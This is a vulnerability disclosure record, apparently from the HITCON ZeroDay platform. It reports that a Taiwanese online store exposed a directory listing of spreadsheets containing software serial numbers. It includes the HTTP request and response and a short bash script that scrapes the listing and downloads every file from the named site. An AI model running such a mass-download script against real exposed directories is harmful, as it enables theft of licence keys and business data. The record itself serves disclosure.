Vulnerability Overview

ZDID: ZD-2016-00064
Vendor: 泰騰恩
Title: 泰騰恩網路商城洩漏軟體序號
Introduction: 機敏的業務資料不應該擺在網站目錄底下嘿

處理狀態

目前狀態

公開

Last Update : 2016/06/24

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2016/04/22 15:48:21 : 新提交 (由 [email protected] 更新此狀態)
2016/04/27 02:41:25 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2016/04/27 02:47:49 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2016/05/09 02:42:06 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2016/06/24 01:01:41 : 公開 (由 HITCON ZeroDay 服務團隊更新此狀態)

詳細資料

ZDID：ZD-2016-00064
通報者：chris ([email protected])
風險：高
類型：資訊洩漏 (Information Leakage)

參考資料

攻擊者可利用洩漏資訊進行下一步攻擊行為。

OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure

CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

漏洞位置: 無

備註說明:
原為中、低等級弱點，但測試人員發現外洩的軟體序號可成功被使用故調高風險等級

網頁請求:
GET /_files/sndb/ HTTP/1.1
Host: store.tech-titan.com.tw
Connection: close

網頁回應:
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2016 07:32:40 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 70799

&lt;!DOCTYPE HTML PUBLIC &quot;-//W3C//DTD HTML 3.2 Final//EN&quot;&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Index of /_files/sndb&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Index of /_files/sndb&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href=&quot;/_files/&quot;&gt;Parent Directory&lt;/a&gt;
&lt;/li&gt;
&lt; .. 上略&gt;
&lt;li&gt;
&lt;a href=&quot;%bc%c6%a6%ec%aa%a9-Acronis%20True%20Image%202016%20for%20PC-1PC_100%ad%d3.xls&quot;&gt;-Acronis True Image 2016 for PC-1PC_100個.xls&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href=&quot;%bc%c6%a6%ec%aa%a9-Acronis%20True%20Image%202016%20for%20PC-3PC_50%ad%d3.xls&quot;&gt;-Acronis True Image 2016 for PC-3PC_50個.xls&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href=&quot;%bc%c6%a6%ec%aa%a9-Acronis%20True%20Image%202016%20for%20PC-5PC_20%ad%d3.xls&quot;&gt;-Acronis True Image 2016 for PC-5PC_20個.xls&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href=&quot;%bc%c6%a6%ec%aa%a9-Acronis-ATI%20Cloud%202016%20for%201P+3Mobile_10%ad%d3.xls&quot;&gt;-Acronis-ATI Cloud 2016 for 1P+3Mobile_10個.xls&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href=&quot;%bc%c6%a6%ec%aa%a9-Acronis-ATI%20Cloud%202016%20for%203P+10Mobile_10%ad%d3.xls&quot;&gt;-Acronis-ATI Cloud 2016 for 3P+10Mobile_10個.xls&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href=&quot;%bc%c6%a6%ec%aa%a9-Acronis-ATI%20Cloud%202016%20for%205P+15Mobile_5%ad%d3.xls&quot;&gt;-Acronis-ATI Cloud 2016 for 5P+15Mobile_5個.xls&lt;/a&gt;
&lt; .. 下略&gt;

測試語法:

!/bin/bash

curl https://store.tech-titan.com.tw/_files/sndb/ | iconv -f &quot;BIG5&quot; -t &quot;UTF-8&quot; | \
grep &quot;&lt;a href&quot; | sed -r 's#^.&lt;a href=&quot;([^&quot;]+)&quot;&gt; ([^&lt;]+)&lt;/a&gt;.$#\1\t\2#' &gt; /tmp/files.txt

OLDIFS=$IFS
IFS=$'\t'

while read url name
do
wget https://store.tech-titan.com.tw/_files/sndb/$url -O $name
done &lt; /tmp/files.txt
IFS=$OLDIFS